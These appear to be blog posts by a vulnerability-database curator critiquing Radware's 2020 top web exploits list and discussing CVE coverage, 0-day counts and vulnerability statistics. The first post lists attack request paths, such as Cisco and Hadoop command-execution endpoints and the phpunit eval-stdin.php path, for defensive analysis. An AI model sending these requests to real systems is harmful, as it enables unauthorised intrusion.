Commentary on Radware’s Top Web Exploits of 2020

At the close of each year we see at least one article covering the top vulnerabilities / exploits from the prior year. This is usually written on the back of having large detection networks across the Internet that get a comprehensive view of exploitation. It’s a great way to get real intelligence for criminal hacking activity. Unfortunately, we often see a breakdown when it comes to conveying that information in a useful manner. I know there is an argument to be made that the companies releasing such blogs are primarily after PR, sure. But they also have an opportunity to help their clients and the rest of the world by ensuring the blogs contain more useful and actionable information.

For this commentary, I’ll examine Radware’s blog, “The Top Web Service Exploits in 2020” published December 23, 2020 and covered almost verbatim by Security Magazine on January 5, 2021. I don’t have a view into exploit activity itself, but I do have a good view into the vulnerability disclosure landscape that is a cornerstone of this commentary.

We’ll start by setting a few basic ideas for mutual understanding for any such blog. First, each exploit should be tied to a unique vulnerability or it should explain it is an exploit chain and clearly delineate each vulnerability in the chain or explain what it represents if not a pure vulnerability. Second, it should provide at least one external reference for each vulnerability; either a CVE ID, vendor advisory, or commonly accepted third-party advisory such as US-CERT or another similar body. This is what allows the reader to quickly determine if their organization has patched against the vulnerability or not. If I have to spend considerable time trying to determine which vulnerability is being described, many organizations may be at a complete loss trying to figure it out.

With that, let’s look at the top 10 exploited vulnerabilities in 2020, according to Radware, and try to figure out some additional information for perspective. I will also be very clear that Radware’s blog is extremely frustrating and not immediately helpful, instead requiring a lot of extra work. The fact that they only attributed three exploits to a CVE ID is a dismal commentary on the CVE ecosystem. This analysis of their analysis will server as a reminder that comprehensive vulnerability intelligence is the foundation of any good security program.


Service Exploit #1: /ws/v1/cluster/apps/new-application

Based on their description, this appears to match VulnDB 184750 “Apache Hadoop YARN ResourceManager REST API Request Handling Remote Command Execution“. The first thing of interest is it was disclosed on October 19, 2016 and does not have a CVE assignment over four years later. No wonder many organizations aren’t aware of this vulnerability and have not sought out their own remediation strategy.

Service Exploit #2: /manager/html

This is summarized as “Apache Tomcat Manager Application Upload Authenticated Code Execution” and goes on to describe it as “This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a JSP application using a POST request against the /manager/html/upload component.

Despite this description, that does not cleanly map to any vulnerability in VulnDB. The closest matches are CVE-2017-12615 and CVE-2017-12617 which is an abstraction for different platforms, but fundamentally “Apache Tomcat HTTP PUT Method JSP File Upload Remote Code Execution“. On the surface this is a match with Apache Tomcat, JSP application, and POST request to achieve code execution. However, those two CVEs cover a JSP file upload, not a WAR archive, and do not mention the /manager/html/upload component. So we’re left wondering if the exploit described is simply a misconfiguration scenario (i.e. intended functionality not secured) or an actual disclosed vulnerability.

Service Exploit #3: /level/15/exec/-/sh/run/CR

Based on the description, this is a misconfiguration scenario where an administrator sets up a Cisco router with the HTTP admin interface enabled, but without password protection. This allows an attacker to use the legitimate functionality to run arbitrary commands.

Service Exploit #4: /admin/assets/js/views/login.js

Radware says this “resource belongs to Sangoma FreePBX code and it looks like the attackers are trying to detect vulnerable FreePBX servers and exploit one of the known vulnerabilities.” The first issue is that script doesn’t immediately track to a VulnDB entry based on titles, which reflect the script name typically. However, let’s consider the URL being seen: … login.js. Rather than attempting to exploit “one of the known vulnerabilities“, I would suggest instead they are trying default credentials. At least back around 2000, the tried-and-true default credentials of admin/admin were all you needed to access the interface.

This one is curious to me because presumably a company that was detecting exploit traffic and could see e.g. POST requests as demonstrated in Service Exploit #2, would also see that the attackers were trying the default credentials. So we’re left with Service Exploit #4 being of little help and only creating confusion over what is being exploited.

Service Exploit #5: /ftptest.cgi?loginuse=&loginpas=

Radware attributes this to “many cheap Wireless IP web cameras use the same genetic code based on the GoAhead code (the tiny, embedded web server).” This tracks cleanly with VulnDB 181032 “Axis Multiple Products axis-cgi/ftptest.cgi Multiple Parameters Remote Command Execution Weakness“. This is actually a fun rabbit hole as this disclosure originally comes from an audit of a AXIS A1001 Network Door Controller and exploitation of this issue requires privileged access to the management interface. With that in mind, we’re back to a default credential scenario that may be the actual issue. Back in 2001, defaults for Axis network cameras were covered by CVE-2001-1543.

[Update: Z Balazs points out that this finding is likely due to Persirai botnet activity and links to more information.]

Service Exploit #6: /service/extdirect

This is the only one of the ten exploits covered that they include a CVE ID for. CVE-2019-7238 maps to VulnDB 198437 “Nexus Repository Manager /service/extdirect Insufficient Access Control Request Handling Remote Code Execution“. But, is that really the right ID? If we look at CVE-2020-10204 we are given a very brief summary of “Sonatype Nexus Repository before 3.21.2 allows Remote Code Execution” and a link to the vendor advisory. However, VulnDB 226228 also maps to this and is summarized as “Nexus Repository Manager /service/extdirect Request Handling Remote Command Execution“. We immediately see the /service/extdirect from Radware’s finding in both titles. The vendor’s advisory does not include this endpoint though, but we find it in this exploit published on GitHub that tracks with the CVE-2020-10204 and we see it in a different exploit for CVE-2019-7238.

CVE-2019-7238 was fixed in Nexus Repository Manager version 3.15.0 and CVE-2020-10204 was fixed in version 3.21.2. Due to the vague vendor advisories it difficult to tell if this was a regression situation or something else. But, the CVE-2020-10204 vendor advisory gives us the interesting bit in the context of exploitation: “The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM.” That is an important distinction! So this is likely CVE-2019-7238 as Radware says, unless there are default credentials which would allow for exploiting CVE-2020-10204 as well.

Looking at the NVD entry for CVE-2020-10204 we also see that they scored this incorrectly for their CVSSv3 score, as ‘Privileges Required‘ should be ‘High‘, notLow‘ as they have it.

Service Exploit #7: /solr/admin/info/system?wt=json

For this one, we get an Apache Bug ID (SOLR-4882) and CVE-2013-6397 as references which is great. That said, it would be very helpful if Radware would link to these resources to make it easier for their readers.

Service Exploit #8: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

This is the third exploit they match to an ID, CVE-2017-9841 and it was disclosed June 27, 2017. Another good reminder that software with disclosed vulnerabilities and vendor solutions are not being applied, causing many organizations to become low-hanging fruit in the exploit world.

One little nitpick is that the full path they include is likely not how this would manifest on a server. Everything after “src” would be the endpoint being scanned presumably: /Util/PHP/eval-stdin.php

Service Exploit #9: /hudson

With this, we run into another mess and rabbit hole. Radware summarizes this as “Hudson continuous integration tool – multiple vulnerabilities” and further describes Hudson as “a continuous integration tool written in Java, which runs in a servlet container, such as Apache Tomcat or the GlassFish application server. Over the years the project was replaced by Jenkins. The final release. 3.3.3 was on February 15, 2016. Today Hudson is no longer maintained and was announced as obsolete in February 2017.

Based on this description, this could be any one of at least 50 vulnerabilities going back to February, 2014, one of which does not have a CVE ID. 41 of these are in Jenkins software which is mentioned above.

Other Service Exploits

This is a curious conclusion to the “top 10” list, as it states “In addition to the new items that we covered in this list, we have also seen items that we already saw and covered in our previous blog Top 10 Web Service Exploits in 2019 such as /ctrlt/DeviceUpgrade_1, /TP/public/index.php and /nice%20ports%2C/Tri%6Eity.txt%2ebak.

That isn’t exactly a #10 on this list, rather a catch-all for “other stuff we saw including…“. The first listed tracks with VulnDB 170573 “Huawei HG532 Routers /ctrlt/DeviceUpgrade_1 NewStatusURL Element Remote Command Execution (Satori)” which is notable as it is used in Satori, a Mirai botnet variant.

The second tracks with VulnDB 194379 “ThinkPHP /public/index.php call_user_func_array() Function vars[1][] Parameter Remote Code Execution“. Note the different exploit path and we see it can actually be exploited via several endpoints according to analysis of the vulnerability by Knownsec 404 Team.

The third doesn’t immediately track with an entry in VulnDB. Radware gives us “/nice%20ports%2C/Tri%6Eity.txt%2ebak” which we can decode to a more friendly “/nice ports,/Trinity.txt.bak“. A quick Google for that request finds a blog from Dragos titled “Threat Hunting With Python Part 2: Detecting Nmap Behavior with Bro HTTP Logs” explaining this request:

The request for “/nice ports,/Trinity.txt.bak” comes from Nmap’s service detection routine testing how a server handles escape characters within a URI. The actual request is “GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0\r\n\r\n”.

So this isn’t an actual exploit, rather, it indicates that attackers are using the Nmap port scanner. This is a good reminder that “exploit scanning” doesn’t always cleanly map to a specific vulnerability.


Detecting exploitation is critical for every organization. Doesn’t matter if it is on-premises devices or a managed service-based detection. What is more critical is having comprehensive and timely vulnerability intelligence that can turn what you detect into actionable information. This is how you not only detect, but evaluate and remediate, assuming of course the vulnerability is known to the vendor or a mitigation can be enacted.

Not all CVEs are Created Equal. Or even valid…

[I wrote this early 2019 and it was scheduled for January 7 but it apparently did not actually publish and then got lost in my excessive drafts list. I touched it up this week to publish because the example that triggered this blog is old but the response is evergreen. Apologies for the long delay!]

I recently caught a Tweet from @NullCon offering 10 free conferences passes to NullconDasham, awarded to “InfoSec heroes who shared their hard work with the community & contributed to the @CVEnew database“.

I re-Tweeted with comment pointing out “There were at least 311 CVE assignments in 2018 alone, that were for issues that were *not* a vulnerability. I hope you are going to scrutinize the submissions.” Anant Shrivastava replied asking for some examples, and the next morning Mitja Kolsek suggested a blog would be beneficial. Here it is, as short and sweet as I can, which is never short in the world of Vulnerability Databases (VDBs) due to caveats.

Continue reading

Thoughts on 0-days and Risk in 2020

[Stupid WordPress. This was scheduled to publish Nov 23 but didn’t for some reason. Here it is, a bit late…]

On Friday, Maddie Stone from the Google P0 team Tweeted about the 0-day exploits her team tracks. As someone who checks that sheet weekly and tracks vulnerabilities, including ones ‘discovered in the wild’, this is a topic that is squarely in my tiny niche in the industry. Also, big fan of the P0 team!

I replied to her Tweet suggesting it come with a disclaimer that it didn’t represent “all” 0-days, rather they tracked high-end 0-day used primarily in “APT” attacks. Ben Hawkes, manager of the team, replied and agreed with that assessment. Before we proceed, let’s define 0-day real quick since the term is used for a variety of vulnerabilities, often incorrectly.

In this case, the context is a 0-day is a vulnerability that was actually found being exploited in the wild before there was public knowledge of it. In Risk Based Security’s VulnDB, we track that as “discovered in the wild“. Since VulnDB is comprehensive and our goal is to track every vulnerability, regardless of software or severity, we tend to aggregate a lot more than others. As of this post, we have over 78,000 vulnerabilities that aren’t found in CVE / NVD as a point of comparison. In my reply to Maddie I pointed out that we had seen 51 this year compared to their 22.

Next, Allen Householder replied to me asking a fun point, which is how many vulnerabilities did that really represent. Out of the 20,000+ vulnerabilities aggregated in 2020, we have 51 that are flagged as “discovered in the wild”. That represents only 0.25% of all vulnerabilities this year. One point I made previously is that Google’s team likely doesn’t care about a 0-day in the “Adning Advertising Plugin for WordPress” despite it being used to compromise WordPress blogs.

So with that number in mind, it goes back to the narrative that companies need to be scared of 0-days. They absolutely do! But… and this is the big qualifier that needs to come with that fear, is that perhaps they don’t need to be as afraid of 0-days as they do of already public vulnerabilities that they missed. With only 51 0-days in 2020, that means a vast majority of organizations simply aren’t likely to be targeted. Fully patching all known vulnerabilities that impact them should be priority one.

More to the point, vulnerabilities that have functional public exploits allowing anyone to trivially launch a viable attack are consistently a much bigger risk than the elusive 0-days. That is also one reminder of how often times CVSS falls short, if your vulnerability intelligence doesn’t provide Temporal scoring or exploit availability. Organizations making risk decisions only using the CVSS Base score are missing out on an important risk attribute.

I’ll end this blog with some arbitrary statistics around 0-days for fun! These are based on VulnDB data as of 11/21/2020. Note that metadata is less complete before 2012, which includes ‘discovered in the wild’ classification.

  • 241,690 vulnerabilities, only 641 are 0days (0.27%)
  • 14 are in Google products: Chrome (5), V8 (3), Android (6)
  • 146 are in Microsoft products: Windows (63), IE (36)
  • 13 are in Apple products
  • 7 are in Oracle products: Java (4)
  • 62 are in Adobe products: Flash (38), Reader (14)
  • 18 are in security products 😞
  • The oldest is from 1975 in RSTS/E! Yes, for real.
  • The oldest you likely recognize is Sendmail in November, 1983

Vulnerability Counts Are a Moving Target

At the end of each year, we see articles covering how many vulnerabilities were disclosed the prior year. Because the articles are written about the same time of year, it gives a fairly good initial comparison from year to year; at least, on the surface. This is the foundation of statements such asSecurity vulnerabilities in critical infrastructure up 600%”. My company, Risk Based Security, even includes that general type of observation in our vulnerability reports, with caveats. These sensationalized counts and figures are also often used to make claims that one product is more or less secure than another, when the vulnerability counts cannot typically be used for such claims as they are built on severely incomplete data. In reality, we must remember that such numbers are only a snapshot in time and serve as a quick comparison between years, not much more.

Before we get to the “moving target” topic, we need to cover a bit of background on how all this happens.

First, consider that even with a large team doing vulnerability aggregation, there is a limit to the number of sources that can be monitored. While a team might monitor over 4,000 sources on a daily to weekly basis, we know there are a lot more out there. As new researchers create their blogs, older vendors finally create advisory pages, and new vendors pop up, the new sources are growing at an incredible rate. Additionally, consider that there are over a million results for “site:github.com changelog.md” (not to mention variations like “release_notes” or “changelog.txt” and similar) that could potentially host a trove of vague vulnerability mentions. Even more daunting, back in 2010 GitHub was hosting 1 million repositories and now they are over 100 million. That means there are an overwhelming number of bug trackers, pull requests, and over a billion commits on a single site. Any company that claims to monitor all of that or “millions” or sources? Do your due diligence and be ready to walk away from them.

Second, due to available resources, vulnerability aggregation teams have to prioritize their activity. This is usually done by vendor, product, and the time frame where higher deployment vendors and products get the most attention. With “time frame”, emphasis is placed on the more recent vulnerabilities as they are most likely to be relevant to organizations. Moving past that, a vulnerability intelligence (VI) provider must be working with clients to learn what resources they use in their organization, as it allows them to prioritize and ensure that they are covering exactly what is deployed first and foremost. After all that, as time permits, they have to come up with new ways to expand source coverage without compromising quality or speed.

With that in mind, consider a vendor that finally publishes a changelog or makes their bug tracker open for everyone. While a VI team should love to go through such resources as far back as possible, they have to limit themselves to vulnerabilities for the current year, and then some amount of time farther back in case clients are using older versions (especially for third-party dependencies). Time permitting, the team should then go back even further to dig for older and more obscure vulnerabilities. While these may or may not immediately benefit clients based on the software they are running, it does contribute directly to the vulnerability history of a given product or vendor. This is invaluable in determining the “cost of ownership” for a product and is vital to making a decision between multiple vendors offering the same type of solutions. With all of that data, it is trivial for a VI provider to provide a quick and easy-to-understand picture of that cost.

Even with very limited time to dig that far back into sources, the impact can still be seen clearly. In January of 2013, Risk Based Security’s VulnDB team had aggregated 8,822 vulnerabilities for the 2012 calendar year, and CVE covered only 4,765 of them (54%). Compared to the prior year (7,911 in 2011), we could say that disclosures increased around 10%. The next question we must ask is if those numbers aged well and hold true today.

Looking at VulnDB now, there were 10,856 vulnerabilities disclosed in 2012. So in the past eight years, the team has managed to find an additional 2,034 vulnerabilities disclosed that year. That means comparing 2012’s updated 10,856 count with the older 7,911 count for 2011, the percent increase was closer to 28%. But wait, we can no longer use the 7,911 count for 2011 either, since that too is a moving target! Ultimately, as previously stated, these disclosure numbers are only good as a snapshot in time. Depending when you perform the count, you may find wildly varying results that could heavily bias any conclusions you try to make. Do the people writing the statistics you read and cite disclaim that?

In January of 2013, I started taking counts every month for how many vulnerabilities VulnDB aggregated for the 2012 calendar year. Almost eight years later, and this blog and chart shows just how much that number can change. As with all vulnerability statistics, please make sure you fully understand what they really mean and disclaim as needed!

Viewing 2012 disclosures; chart shows 7k / 11k as min / max values.

With this visual we can see that in the years after 2012, vulnerability aggregation continued to rise considerably. Over time that growth tapers off as the team simply didn’t have time to keep digging that far back into changelogs and bug trackers looking for more vulnerabilities that were less beneficial to organizations.

The tl;dr takeaways:

  • The number of vulnerabilities disclosed in a given year is static, but the VI teams that aggregate the information won’t find them all that year.
  • Vulnerabilities by year, as reported, will slowly climb over time as additional aggregation work is performed.
  • While that newly aggregated data may be “old” as far as what software is being used within an organization, it still contributes to better metadata and product/vendor evaluation (“cost of ownership”)

“The History of CVE” and A Couple of Objections

I just read “The History of Common Vulnerabilities and Exposures (CVE)” by Ary Widdes from Tripwire and found it to be a great summary of the 20+ years of the program. I say that as an outspoken CVE and MITRE critic even! I do have a couple of objections however, with the conclusion, and then a fun bounty!

Widdes concludes the history by saying:

A lot has changed in the 21 years since the CVE List’s inception – both in terms of technology and vulnerabilities. Without the CVE List, it’s possible that security professionals would still be using multiple tools from multiple vendors just to ensure complete coverage. It’s also possible that someone else would have created a service similar to the CVE List. Either way, from idea to whitepaper to database, the CVE List has become a core part of vulnerability and patch management.

There’s a lot to unpack here so I will take it one sentence at a time, starting with the second.

“Without the CVE List, it’s possible that security professionals would still be using multiple tools from multiple vendors just to ensure complete coverage.”

No, there is no “possible” here. That is a simple reality with an important caveat. The reality is that teams of all types still use multiple tools from multiple vendors to do their job. The caveat, and more to the point of that sentence, is that CVE doesn’t offer “complete coverage” and many of the vulnerability scanners only cover a third of the issues in CVE for various reasons. Even using a combination of firewalls, vulnerability scanners, intrusion detection/prevention, audits, and a slew of other tools, organizations are likely seeing half of what CVE has to offer at best. Widdes’ conclusion here gives undue credit to CVE and the state of vulnerability coverage it offers.

It’s also possible that someone else would have created a service similar to the CVE List.

This is where the vulnerability historian in me wants to rage a bit. This statement is unequivocally false for the simple reason that vulnerability databases existed before CVE, both free (e.g. X-Force) and commercial (e.g. RSI), in 1997 alone [1]. The first vulnerability database was created in 1973, specific to Multics, but also when there weren’t that many other systems to catalog bugs or vulnerabilities in. In 1983 we saw the Mt Xinu Bug List and in 1985 Matt Bishop’s List of UNIX Holes, both of which were more comprehensive than one platform. If we consider a vulnerability database implemented via product, we had ISS, SATAN, Ballista, and Nessus between 1995 and the creation of CVE in 1999. Many of the hackers turned security professionals may fondly remember Fyodor’s Exploit World (1996 – 1998) from both aspects of their lives. Those same folks probably also remember Packet Storm (1998) which is still running today.

Either way, from idea to whitepaper to database, the CVE List has become a core part of vulnerability and patch management.

This, unfortunately, is true. I say unfortunately because of my long-standing criticisms of CVE over the past decade, but won’t go into here.

Bug(s) Bounty:

If there is anyone at MITRE open to outright bribery, including all-you-can-eat sushi dinners, I will pay a bounty to get my hands on that list of 8,400 submissions! While I know there are likely a lot of duplicates, the vulnerability historian in me would love to audit that data to see if MITRE decided to skip any that would be considered vulnerabilities by today’s standards, or where someone else back then had more knowledge of a vulnerability than was submitted. That data is over twenty years old and was solicited, processed, and partially published with U.S. taxpayer funded money. There’s no reason not to make it public. =)

[1] The Repent Security Inc. (RSI) database existed in 1997 but may not have been offered as a commercial product until 1998.

Why @anacondainc Doesn’t Fully Understand CVEs

It’s worrisome that in 2020 we still have people in influential technical roles that don’t understand CVE. A friend told me earlier this year he was in a meeting where someone said that CVE IDs are assigned in order, so CVE-2020-9500 meant there were 9500 vulns in 2020 so far. Of course that is not how it works and a dangerous understanding of CVE.

I ran across an article written by Nick Malkiewicz of Anaconda titled “Why Understanding CVEs Is Critical for Data Scientists“. This article has several bits that show a lack of understanding of what CVE is. One of the biggest is equivocating a CVE with a vulnerability. Yes, many vulnerabilities directly map to a single CVE identifier, but a CVE is the identifier not the vulnerability. Additionally, sometimes one vulnerability can track with multiple CVE IDs, or one CVE ID can track to multiple vulnerabilities. So lines like the following are concerning:

When someone finds a CVE, they report it to a CVE Numbering Authority (CNA).

When someone finds a vulnerability, they report it to MITRE or a vendor, who may be a CNA but more often not one. That vendor can then ask MITRE for an ID via a web form.

CNAs assign identification numbers to CVEs and list them in publicly accessible databases.

A CNA is required to inform MITRE after a CVE-assigned vulnerability has been disclosed. That is actually a fairly recent rule, implemented in the last few years. For most of CVE’s history there was no requirement or specific communication channel for a CNA to notify MITRE of this. That was one of many failings of the CVE ecosystem and directly led to companies being breached, as they relied on CVE to be ‘complete’ and timely.

Each vulnerability listed in a CVE database has a score from .1 to 10, 10 being the highest risk level. These scores are based on exploitability, impact, remediation level, report confidence, and other qualities.

Technically, not even the first line is true as NVD can score a vulnerability as 0.0, meaning it is not a vulnerability and poses no risk. This occurs when a researcher or vendor disclose a vulnerability but don’t fully understand the issue or the subsequent impact. This happens hundreds of times a year although many are not included in NVD. The second sentence from Anaconda is also incorrect as NVD only scores CVSS Base scores. The exploitability, remediation level, and report confidence are part of Temporal scores and not included. You can see an example with CVE-2020-2800 published by Oracle and given a CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N score by both Oracle and NVD. This misunderstanding of NVD CVSS scoring is more baffling as Anaconda links to the same FIRST CVSS document I do in this paragraph.

Anaconda goes on talking about how there are other factors at play including looking at the history of a package, how fast vendors respond, and more. This is great advice and critical for companies facing tens of thousands of vulnerabilities a year. Unfortunately, they slide into the “more lipstick on that pig” problem:

The good news is, there are tools that automate the CVE monitoring process.

This is true. But, more ways to manipulate bad data still leaves you with bad data. In addition to CVE missing several thousand vulnerabilities a year, their push for quantity in the last few years have led to a serious hit on quality. There are some CVE IDs that have descriptions missing critical information like the vendor, affected version, or impact. All the data wrangling and fancy analysis of that data is still based on bad or incomplete information. All the lipstick on that pig still makes it a pig.

Finally, I will quote on other line from their blog that is curious:

Hacking open-source software also has a bigger payoff because many more people use it.

I understand and appreciate the sentiment, and finding a vulnerability in a library like OpenSSL obviously has a huge impact. However, that and a couple dozen libraries are still the outliers in the bigger picture. Compare your vulnerabilities like EternalBlue to a standard open source library vulnerability and they are not even close as far as how “many more people use it”.

Rebuttal: Dark Reading’s “9” Sources for Tracking New Vulnerabilities

[This was originally published on the OSVDB blog.]

Earlier today, Sean Martin published an article on Dark Reading titled “9 Sources For Tracking New Vulnerabilities“. Spanning 10 pages, likely for extra ad revenue, the sub-title reads:

Keeping up with the latest vulnerabilities — especially in the context of the latest threats — can be a real challenge.

One would hope this article would help with that challenge, and it most certainly is one. First, a disclaimer; I was involved with OSVDB for roughly 10 years and the primary curator over that time. Further, I am now involved with Risk Based Security’s VulnDB commercial vulnerability database offering. Both of these are mentioned in the article, so my comments below will most certainly have some level of bias.

To help readers, Sean Martin writes “In no particular order, here are nine key vulnerability data sources for your consideration.” With that, flip to the next page of the article.

It’s important to understand the source — and backing for your source — to avoid getting left without a solid vulnerability database. A good example is the case where many had to say goodbye to their vulnerability feed when minority-player Open Source Vulnerability Database (OSVDB) was shut down.

“Not having OSVDB any longer, while sad for those that relied on it, may actually reduce the complexity in making sure there is integration across all products, MSSPs, services, and SIEMs,” says Fred Wilmot, chief technology officer at PacketSled

I am not sure how OSVDB constituted a “minority-player” in any sense of the term given the broad coverage for a decade. While historical entries were often incomplete, the database was commercially maintained from just before January, 2012, and the information was still given away for free, despite competing with the company providing the support and updates. Since the quote specifically mentions that OSVDB shut down, and it did on April 5, 2016, it’s nice to hear people give belated appreciation to the project. OSVDB shutting down, I would argue, does not reduce the complexity of anything for those knowledgeable about vulnerability disclosure. On the surface, sure! One less set of IDs to integrate across products sounds like a good thing. However, you have to also remember that OSVDB was cataloging thousands of vulnerabilities a year that were not found in the other sources listed in this article. That means there is a level of complexity here that is horrible for companies trying to keep up with vulnerabilities.

Page 3 tells readers about NIST’s National Vulnerability Database (NVD):

NVD is the US government repository of standards-based vulnerability management data. This data enables automation of vulnerability management, security measurement, and compliance. NVD is based on and synchronized with the CVE List (see next slide).

First, since NVD is synchronized with CVE, it is curious that they are listed as separate sources. For those not aware, NVD is a sort of ‘value add’ to CVE in that they generate CVSS and CPE data for the vulnerabilities cataloged by MITRE for the CVE project. Monitoring NVD means you are already monitoring all of CVE and getting the additional meta-data. It is also important to note that the meta-data is outsourced to a contractor who employs ‘junior analysts’ to do the work. This becomes apparent if you consume there data and actually look at their CVSS scores over the last ~ 8 years. Personally, I stopped emailing them corrections many years back due to the volume involved. To this day, you can still often see them scoring Adobe Flash vulnerabilities as CVSSv2 10.0, meaning they miss the ‘context-dependent’ (a.k.a. ‘user-assisted’) aspect which means the access complexity moves from ‘L’ow to ‘M’edium per the CVSSv2 scoring guide on FIRST, resulting in a 9.3 score. Seems minor, but that reclassifies a vulnerability from ‘Critical’ to ‘High’ for many organizations, and should make you question their scoring on more complex issues.

Page 4 tells us more about CVE and offers some “insight” into it that is horribly wrong:

CVE is a dictionary of publicly known information security vulnerabilities and exposures. CVE’s common identifiers enable data exchange between security products and provide a baseline index point for evaluating coverage of tools and services.

Morey Haber, VP of technology at BeyondTrust, offers these examples:
Scanning tools most commonly use CVEs for classification
SIEM technologies understand their applicability in reporting
Risk frameworks use them as a calculation vehicle for applied risk to the business

First, I cannot over-share Steve Ragan’s recent article titled “Over 6,000 vulnerabilities went unassigned by MITRE’s CVE project in 2015“. Consider just the headline, and then think about the fact that CVE does not catalog at least 47,267 vulnerabilities historically. Now, re-read Haber’s examples of how CVE is used and what kind of Achilles’ heel that is for any organization using security software based on CVE.

Fred Wilmot’s quote about CVE is what prompted me to write this entire blog. This is so incredibly wrong and misleading:

“Now that you have a common calculator for interoperability among vendors, the fact that CVE is maintained completely transparently to the community is a HUGE pro,” says Fred Wilmot, chief technology officer at PacketSled. “There is no holdout of exploits for vulnerabilities based on financial gain or intent. It’s altruism at its best. The weakness in the CVE comes in the weaponization of that information and the lack of disclosure for profit and activism, as two examples.”

Where to start…

  1. There is no common calculator for “interoperability among vendors” in the context of CVE. That isn’t what CVE is or does.
  2. CVE is most certainly not maintained transparently to the community. It is not maintained transparently to the volunteer Editorial Board (now known simply as the ‘CVE Board’) either. The backroom workings and decisions MITRE makes on behalf of CVE without Board or public input have been documented before. The last decision that lacked any transparency was their recent catastrophic decision to change the CVE format to a new ‘federated’ scheme. If you have any doubt about this being a backroom decision, look at the first reply from CVE Board member Kurt Seifried.
  3. Wilmot’s characterization that CVE is “altruism at its best” also speaks to a lack of knowledge of CVE. While MITRE, the organization that maintains CVE, is technically a not-for-profit organization, they only take non-compete contracts at incredible expense to the U.S. taxpayer. CVE, and a handful of other ‘C’ projects related to information security, bring in considerable money to the company. In 2015, they enjoyed over $1.4 billion in revenue and maintained $788 million in assets. The fact that the contract to maintain CVE is non-compete, and cannot be bid on by companies more qualified to run the project, speaks to where the real interest lies and it isn’t altruistic.
  4. The weakness in CVE is certainly not the “weaponization” of that information. A significant majority of weaponized exploits that lead to the thousands of data breaches and organizations being compromised are typically done with functional exploits that enjoy little technical information being made public. For example, phishing attacks that rely on Adobe Reader or Adobe Flash are usually patched by Adobe eventually, and the subsequent disclosure has no technical details. Even if researchers post more details down the road, the entries in CVE are rarely updated to include the additional details.
  5. The last bit of Wilmot’s quote, I will need someone to explain to me. “The weakness in the CVE [..] comes in the lack of disclosure for profit and activism.” I don’t know what that means.

Page 5 tells readers about the CERT Vulnerability Notes Database:

The Vulnerability Notes Database provides information about software vulnerabilities. Vulnerability notes include summaries, technical details, remediation information, and lists of affected vendors. Most Vulnerability notes are the result of private coordination and disclosure efforts. For more comprehensive coverage of public vulnerability reports, consider the National Vulnerability Database (NVD).

“This is nice to have, but it still uses CVEs as reference,” says Fred Wilmot, chief technology officer at PacketSled. “NVD is not nearly as practical to consume directly as CVE — the disclosure form is fine, but why would I go there and not directly to MITRE for CVE establishment first? However, it’s probably a good place to spend time during an investigation.”

The CERT VNDB is not a comprehensive vulnerability database, and does not aim to be one. As mentioned, their information is primarily via their assisting researchers in coordinating a disclosure with a vendor. Since CERT is a CNA, meaning they can assign CVE IDs to vulnerabilities they coordinate, it means that over 99% of their entries are covered by CVE and thus NVD. Monitoring NVD will get you all of CVE and almost all of CERT VNDB. The very few CERT VU that do not get CVE IDs assigned before disclosure are rare, and I believe they get assignments shortly after from MITRE.

Once again, Wilmot speaks about these sources and doesn’t appear to have real working knowledge which personifies my term ‘vulnerability tourist’. CERT VNDB disclosures appear on their site before they appear in CVE or NVD. It may be 24 – 72 hours before they appear in fact, meaning that while it still uses CVEs as a reference, for timely monitoring of vulnerabilities it may be important to keep an eye out on CERT directly. Next, Wilmot goes on to say “NVD is not nearly as practical to consume directly as CVE”, apparently not realizing that NVD makes its data available in XML. While MITRE makes the CVE data in several formats, it doesn’t mean NVD is not easy to consume. The most important distinction here is that NVD comes with CPE data where CVE does not. For any medium to large organization, this is basically mandatory meta-data for actually putting the information to use.

Page 6 tells readers about Risk Based Security’s VulnDB offering. The curious bit to me is the quote from Morey Haber:

“VulnDB does not contain audit information, but it is a good source for solutions that need to reference vulnerability information in their products such as firewalls or IDS/IPS and do not want to rely on open source or to build/maintain a library,” said Morey Haber, VP of technology at BeyondTrust.

First, BeyondTrust is not a user of VulnDB, which is a commercial offering unlike CVE/NVD/CERT. They did a short-term trial in 2012, during the beginning of the offering and opted not pursue it as a source of vulnerability intelligence. Second, what does “audit information” even mean in the context of a VDB? Audit information about your own environment maybe? Something that a vulnerability intelligence provider can’t possibly deliver. An audit trail is maintained for each vulnerability entry and is available to customers, but I doubt that is what he means since calling VulnDB out on this doesn’t make sense and the other sources of vulnerabilities listed in this article don’t maintain such a trail.

While VulnDB can certainly be used to reference vulnerabilities in security products as he says, that is the tip of the iceberg. With over 47,000 vulnerabilities not found in CVE or NVD, the breadth of information is incredible. Further, VulnDB has made a concerted effort for years to track vulnerabilities in third-party libraries, and builds on top of the robust meta-data that has been generated for over a decade. Haber’s comments do not reflect actual knowledge of the VulnDB offering.

Page 7 tells readers about the DISA IAVA Database And STIGS. Haber gives commentary on this as well:

“IAVA, the DISA-based vulnerability mapping database, is based on existing SCAP sources, and once in a while it contains details for government systems that are not a part of the commercial world,” says Morey Haber, VP of technology at BeyondTrust. “For any vendor doing .gov or .mil work, this reference is a must.”

While some of the IAVA advisories may contain additional detail, it is important to note that these will not provide any vulnerabilities above and beyond CVE/NVD, and their advisories lag well behind the issues being published in CVE/NVD. Haber is right, that this is a vital resource for .gov and .mil contractors, for several reasons.

Page 8 tells readers about SecurityTracker.com, which is a long-running site that aggregates vulnerabilities to a degree. Haber once again provides commentary:

“The website tends to focus on non-OS vulnerabilities, but they are certainly included in the feed,” says Morey Haber, VP of technology at BeyondTrust. “Infrastructure and IoT tend to make the front page the most, and this site is a good third-party reference for new flaws.”

